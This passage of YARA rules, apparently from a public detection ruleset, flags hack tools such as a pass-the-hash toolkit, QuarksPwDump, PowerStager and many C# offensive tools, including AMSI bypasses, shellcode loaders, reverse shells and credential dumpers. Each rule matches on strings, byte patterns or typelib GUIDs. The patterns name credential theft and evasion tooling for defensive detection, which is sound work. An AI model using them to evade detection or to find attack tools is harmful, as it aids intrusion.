"IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '43.00' */ $s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.00' */ $s3 = "username:domainname:lmhash:nthash" fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */ $s4 = "Error in cmdline!. Bye!." fullword ascii /* score: '12.00' */ $s5 = "Error: Cannot open LSASS.EXE!." fullword ascii /* score: '12.00' */ $s6 = "nthash is too long!." fullword ascii /* score: '8.00' */ $s7 = "LSASS HANDLE: %x" fullword ascii /* score: '5.00' */ condition: uint16(0) == 0x5a4d and filesize < 240KB and 2 of them } rule genhash_genhash : Toolkit { meta: description = "Auto-generated rule - file genhash.exe" author = "Florian Roth" reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit" date = "2015-07-10" score = 80 hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f" strings: $s1 = "genhash.exe <password>" fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */ $s3 = "Password: %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii /* score: '11.00' */ $s5 = "This tool generates LM and NT hashes." fullword ascii /* score: '10.00' */ $s6 = "(hashes format: LM Hash:NT hash)" fullword ascii /* score: '10.00' */ condition: uint16(0) == 0x5a4d and filesize < 200KB and 2 of them } rule iam_iamdll : Toolkit { meta: description = "Auto-generated rule - file iamdll.dll" author = "Florian Roth" reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit" date = "2015-07-10" score = 80 hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602" strings: $s0 = "LSASRV.DLL" fullword ascii /* score: '21.00' */ $s1 = "iamdll.dll" fullword ascii /* score: '21.00' */ $s2 = "ChangeCreds" fullword ascii /* score: '12.00' */ condition: uint16(0) == 0x5a4d and filesize < 115KB and all of them } rule iam_iam : Toolkit { meta: description = "Auto-generated rule - file iam.exe" author = "Florian Roth" reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit" date = "2015-07-10" score = 80 hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231" strings: $s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii /* PEStudio Blacklist: strings */ /* score: '59.00' */ $s2 = "iam.exe -h administrator:mydomain:" ascii /* PEStudio Blacklist: strings */ /* score: '40.00' */ $s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii /* PEStudio Blacklist: strings */ /* score: '33.00' */ $s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */ $s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii /* score: '26.00' */ $s6 = "Error in cmdline!. Bye!." fullword ascii /* score: '12.00' */ $s7 = "Checking LSASRV.DLL...." fullword ascii /* score: '12.00' */ condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule whosthere_alt_pth : Toolkit { meta: description = "Auto-generated rule - file pth.dll" author = "Florian Roth" reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit" date = "2015-07-10" score = 80 hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0" strings: $s0 = "c:\\debug.txt" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */ $s1 = "pth.dll" fullword ascii /* score: '20.00' */ $s2 = "\"Primary\" string found at %.8Xh" fullword ascii /* score: '7.00' */ $s3 = "\"Primary\" string not found!" fullword ascii /* score: '6.00' */ $s4 = "segment 1 found at %.8Xh" fullword ascii /* score: '6.00' */ condition: uint16(0) == 0x5a4d and filesize < 240KB and 4 of them } rule whosthere : Toolkit { meta: description = "Auto-generated rule - file whosthere.exe" author = "Florian Roth" reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit" date = "2015-07-10" score = 80 hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37" strings: $s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '48.00' */ $s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */ $s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii /* PEStudio Blacklist: strings */ /* score: '28.00' */ $s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */ $s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */ $s6 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */ condition: uint16(0) == 0x5a4d and filesize < 320KB and 2 of them } rule Powerstager { meta: author = "Jeff White - jwhite@paloaltonetworks.com @noottrak" date = "02JAN2018" hash1 = "758097319d61e2744fb6b297f0bff957c6aab299278c1f56a90fba197795a0fa" //x86 hash2 = "83e714e72d9f3c500cad610c4772eae6152a232965191f0125c1c6f97004b7b5" //x64 description = "Detects PowerStager Windows executable, both x86 and x64" reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/" reference2 = "https://github.com/z0noxz/powerstager" strings: $filename = /%s\\[a-zA-Z0-9]{12}/ $pathname = "TEMP" wide ascii // $errormsg = "The version of this file is not compatible with the version of Windows you're running." wide ascii $filedesc = "Lorem ipsum dolor sit amet, consecteteur adipiscing elit" wide ascii $apicall_01 = "memset" $apicall_02 = "getenv" $apicall_03 = "fopen" $apicall_04 = "memcpy" $apicall_05 = "fwrite" $apicall_06 = "fclose" $apicall_07 = "CreateProcessA" $decoder_x86_01 = { 8D 95 [4] 8B 45 ?? 01 D0 0F B6 18 8B 4D ?? } $decoder_x86_02 = { 89 C8 0F B6 84 05 [4] 31 C3 89 D9 8D 95 [4] 8B 45 ?? 01 D0 88 08 83 45 [2] 8B 45 ?? 3D } $decoder_x64_01 = { 8B 85 [4] 48 98 44 0F [7] 8B 85 [4] 48 63 C8 48 } $decoder_x64_02 = { 48 89 ?? 0F B6 [3-6] 44 89 C2 31 C2 8B 85 [4] 48 98 } condition: uint16be(0) == 0x4D5A and all of ($apicall_*) and $filename and $pathname and $filedesc and (2 of ($decoder_x86*) or 2 of ($decoder_x64*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule QuarksPwDump_Gen : Toolkit { meta: description = "Detects all QuarksPWDump versions" author = "Florian Roth" date = "2015-09-29" score = 80 hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa" hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f" hash3 = "a59be92bf4cce04335bd1a1fcf08c1a94d5820b80c068b3efe13e2ca83d857c9" hash4 = "c5cbb06caa5067fdf916e2f56572435dd40439d8e8554d3354b44f0fd45814ab" hash5 = "677c06db064ee8d8777a56a641f773266a4d8e0e48fbf0331da696bea16df6aa" hash6 = "d3a1eb1f47588e953b9759a76dfa3f07a3b95fab8d8aa59000fd98251d499674" hash7 = "8a81b3a75e783765fe4335a2a6d1e126b12e09380edc4da8319efd9288d88819" strings: $s1 = "OpenProcessToken() error: 0x%08X" fullword ascii $s2 = "%d dumped" fullword ascii $s3 = "AdjustTokenPrivileges() error: 0x%08X" fullword ascii $s4 = "\\SAM-%u.dmp" fullword ascii condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ // These rules have room for false positives if e.g. a dual use tool is contained within a hack tool repo. // Could also be done with https://yara.readthedocs.io/en/stable/modules/dotnet.html#c.typelib but that needs an extra module. rule HKTL_NET_GUID_CSharpSetThreadContext { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/djhohnstein/CSharpSetThreadContext" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a1e28c8c-b3bd-44de-85b9-8aa7c18a714d" ascii nocase wide $typelibguid1 = "87c5970e-0c77-4182-afe2-3fe96f785ebb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DLL_Injection { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ihack4falafel/DLL-Injection" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3d7e1433-f81a-428a-934f-7cc7fcf1149d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LimeUSB_Csharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/LimeUSB-Csharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "94ea43ab-7878-4048-a64e-2b21b3b4366d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Ladon { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/k8gege/Ladon" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c335405f-5df2-4c7d-9b53-d65adfbed412" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WhiteListEvasion { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/khr0x40sh/WhiteListEvasion" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "858386df-4656-4a1e-94b7-47f6aa555658" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Lime_Downloader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Lime-Downloader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "ec7afd4c-fbc4-47c1-99aa-6ebb05094173" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DarkEye { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/K1ngSoul/DarkEye" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "0bdb9c65-14ed-4205-ab0c-ea2151866a7f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpKatz { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/b4rtik/SharpKatz" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8568b4c1-2940-4f6c-bf4e-4383ef268be9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ExternalC2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ryhanson/ExternalC2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii nocase wide $typelibguid1 = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Povlsomware { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/povlteksttv/Povlsomware" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "fe0d5aa7-538f-42f6-9ece-b141560f7781" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RunShellcode { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/zerosum0x0/RunShellcode" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a3ec18a3-674c-4131-a7f5-acbed034b819" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpLoginPrompt { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/shantanu561993/SharpLoginPrompt" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c12e69cd-78a0-4960-af7e-88cbd794af97" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Adamantium_Thief { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/LimerBoy/Adamantium-Thief" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "e6104bc9-fea9-4ee9-b919-28156c1f2ede" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PSByPassCLM { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/padovah4ck/PSByPassCLM" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "46034038-0113-4d75-81fd-eb3b483f2662" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_physmem2profit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FSecureLABS/physmem2profit" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "814708c9-2320-42d2-a45f-31e42da06a94" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_NoAmci { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/med0x2e/NoAmci" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "352e80ec-72a5-4aa6-aabe-4f9a20393e8e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpBlock { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/CCob/SharpBlock" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3cf25e04-27e4-4d19-945e-dadc37c81152" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_nopowershell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/bitsadmin/nopowershell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "555ad0ac-1fdb-4016-8257-170a74cb2f55" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LimeLogger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/LimeLogger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "068d14ef-f0a1-4f9d-8e27-58b4317830c6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AggressorScripts { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/harleyQu1nn/AggressorScripts" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "afd1ff09-2632-4087-a30c-43591f32e4e8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Gopher { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/EncodeGroup/Gopher" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "b5152683-2514-49ce-9aca-1bc43df1e234" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AVIator { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Ch0pin/AVIator" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4885a4a3-4dfa-486c-b378-ae94a221661a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_njCrypter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xPh0enix/njCrypter" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8a87b003-4b43-467b-a509-0c8be05bf5a5" ascii nocase wide $typelibguid1 = "80b13bff-24a5-4193-8e51-c62a414060ec" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpMiniDump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/b4rtik/SharpMiniDump" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "6ffccf81-6c3c-4d3f-b15f-35a86d0b497f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CinaRAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/wearelegal/CinaRAT" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8586f5b1-2ef4-4f35-bd45-c6206fdc0ebc" ascii nocase wide $typelibguid1 = "fe184ab5-f153-4179-9bf5-50523987cf1f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ToxicEye { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/LimerBoy/ToxicEye" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1bcfe538-14f4-4beb-9a3f-3f9472794902" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Disable_Windows_Defender { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Disable-Windows-Defender" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "501e3fdc-575d-492e-90bc-703fb6280ee2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DInvoke_PoC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/dtrizna/DInvoke_PoC" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "5a869ab2-291a-49e6-a1b7-0d0f051bef0e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ReverseShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/chango77747/ReverseShell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "980109e4-c988-47f9-b2b3-88d63fababdc" ascii nocase wide $typelibguid1 = "8abe8da1-457e-4933-a40d-0958c8925985" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpC2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SharpC2/SharpC2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "62b9ee4f-1436-4098-9bc1-dd61b42d8b81" ascii nocase wide $typelibguid1 = "d2f17a91-eb2d-4373-90bf-a26e46c68f76" ascii nocase wide $typelibguid2 = "a9db9fcc-7502-42cd-81ec-3cd66f511346" ascii nocase wide $typelibguid3 = "ca6cc2ee-75fd-4f00-b687-917fa55a4fae" ascii nocase wide $typelibguid4 = "a1167b68-446b-4c0c-a8b8-2a7278b67511" ascii nocase wide $typelibguid5 = "4d8c2a88-1da5-4abe-8995-6606473d7cf1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SneakyExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/HackingThings/SneakyExec" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "612590aa-af68-41e6-8ce2-e831f7fe4ccc" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UrbanBishopLocal { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/slyd0g/UrbanBishopLocal" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "88b8515e-a0e8-4208-a9a0-34b01d7ba533" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cobbr/SharpShell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "bdba47c5-e823-4404-91d0-7f6561279525" ascii nocase wide $typelibguid1 = "b84548dc-d926-4b39-8293-fa0bdef34d49" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EvilWMIProvider { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/sunnyc7/EvilWMIProvider" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a4020626-f1ec-4012-8b17-a2c8a0204a4b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_GadgetToJScript { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/med0x2e/GadgetToJScript" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "af9c62a1-f8d2-4be0-b019-0a7873e81ea9" ascii nocase wide $typelibguid1 = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AzureCLI_Extractor { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0x09AL/AzureCLI-Extractor" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a73cad74-f8d6-43e6-9a4c-b87832cdeace" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UAC_Escaper { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/UAC-Escaper" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "95359279-5cfa-46f6-b400-e80542a7336a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HTTPSBeaconShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/limbenjamin/HTTPSBeaconShell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "aca853dc-9e74-4175-8170-e85372d5f2a9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AmsiScanBufferBypass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/AmsiScanBufferBypass" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "431ef2d9-5cca-41d3-87ba-c7f5e4582dd2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ShellcodeLoader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Hzllaga/ShellcodeLoader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a48fe0e1-30de-46a6-985a-3f2de3c8ac96" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_KeystrokeAPI { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/fabriciorissetto/KeystrokeAPI" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f6fec17e-e22d-4149-a8a8-9f64c3c905d3" ascii nocase wide $typelibguid1 = "b7aa4e23-39a4-49d5-859a-083c789bfea2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ShellCodeRunner { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/antman1p/ShellCodeRunner" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "634874b7-bf85-400c-82f0-7f3b4659549a" ascii nocase wide $typelibguid1 = "2f9c3053-077f-45f2-b207-87c3c7b8f054" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_OffensiveCSharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/diljith369/OffensiveCSharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "6c3fbc65-b673-40f0-b1ac-20636df01a85" ascii nocase wide $typelibguid1 = "2bad9d69-ada9-4f1e-b838-9567e1503e93" ascii nocase wide $typelibguid2 = "512015de-a70f-4887-8eae-e500fd2898ab" ascii nocase wide $typelibguid3 = "1ee4188c-24ac-4478-b892-36b1029a13b3" ascii nocase wide $typelibguid4 = "5c6b7361-f9ab-41dc-bfa0-ed5d4b0032a8" ascii nocase wide $typelibguid5 = "048a6559-d4d3-4ad8-af0f-b7f72b212e90" ascii nocase wide $typelibguid6 = "3412fbe9-19d3-41d8-9ad2-6461fcb394dc" ascii nocase wide $typelibguid7 = "9ea4e0dc-9723-4d93-85bb-a4fcab0ad210" ascii nocase wide $typelibguid8 = "6d2b239c-ba1e-43ec-8334-d67d52b77181" ascii nocase wide $typelibguid9 = "42e8b9e1-0cf4-46ae-b573-9d0563e41238" ascii nocase wide $typelibguid10 = "0d15e0e3-bcfd-4a85-adcd-0e751dab4dd6" ascii nocase wide $typelibguid11 = "644dfd1a-fda5-4948-83c2-8d3b5eda143a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SHAPESHIFTER { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/matterpreter/SHAPESHIFTER" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a3ddfcaa-66e7-44fd-ad48-9d80d1651228" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Evasor { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cyberark/Evasor" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1c8849ef-ad09-4727-bf81-1f777bd1aef8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Stracciatella { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mgeeky/Stracciatella" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "eaafa0ac-e464-4fc4-9713-48aa9a6716fb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_logger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/xxczaki/logger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9e92a883-3c8b-4572-a73e-bb3e61cfdc16" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Internal_Monologue { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/eladshamir/Internal-Monologue" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "0c0333db-8f00-4b68-b1db-18a9cacc1486" ascii nocase wide $typelibguid1 = "84701ace-c584-4886-a3cf-76c57f6e801a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_GRAT2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/r3nhat/GRAT2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "5e7fce78-1977-444f-a18e-987d708a2cff" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PowerShdll { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/p3nt4/PowerShdll" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "36ebf9aa-2f37-4f1d-a2f1-f2a45deeaf21" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CsharpAmsiBypass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/WayneJLee/CsharpAmsiBypass" author = "Arnim Rupp" date = "2020-12-13" 